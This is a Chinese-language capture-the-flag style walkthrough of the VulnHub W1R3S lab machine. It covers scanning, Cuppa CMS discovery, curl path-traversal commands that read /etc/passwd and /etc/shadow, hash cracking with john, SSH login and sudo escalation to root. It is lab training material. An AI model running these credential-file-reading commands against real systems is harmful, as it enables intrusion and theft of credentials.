靶机基本信息
靶机下载链接见:
https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip
下载好之后,用vmware打开即可,将网络适配器设置为NAT模式
主机发现
也可以使用nmap进行主机发现
信息收集
简单的全端口扫描:
详细的扫描结果:
从扫描的结果可以看出,存在ftp弱口令
目录扫描:
访问http://192.168.255.187/administrator/installation/
发现是Title[Cuppa CMS]框架!CuppaCMS是一套内容管理系统(CMS)!
使用whatweb进行指纹识别:
漏洞发现
谷歌搜索引擎搜索:Cuppa CMS exploit
EXP的地址链接:https://www.exploit-db.com/exploits/25971
漏洞利用
使用curl工具:
–data-urlencode:在新版本的CURL中,提供了新的选项 --data-urlencode,通过该选项提供的参数会自动转义特殊字符。
命令:curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.255.187/administrator/alerts/alertConfigField.php
关键信息结果:
命令:``curl -s --data-urlencode urlConfig=…/…/…/…/…/…/…/…/…/etc/shadow http://192.168.255.187/administrator/alerts/alertConfigField.php `
关键信息结果:
将shadow文件内容(圈出来的)复制到hash.txt中, 然后使用john命令进行破解: sudo john hash.txt
爆破出结果:用户名:w1r3s
密码:computer
ssh登录:
权限提升
使用命令sudo -l
查看当前用户的权限, 可以发现是全权限
是全权限, 可以直接执行sudo su
获取root用户权限
读取root文件有那些,发现flag.txt,读取文件内容
整体来说,这个靶机难度较为简单。
免责声明:本文章涉及的知识和技能仅用于学习研究,如有用于非法途径或未被授权的真实网络环境,所造成的后果及连带责任自行承担,与本文作者无关,倡导把安全知识和技能用于正当、正规、正义的途径。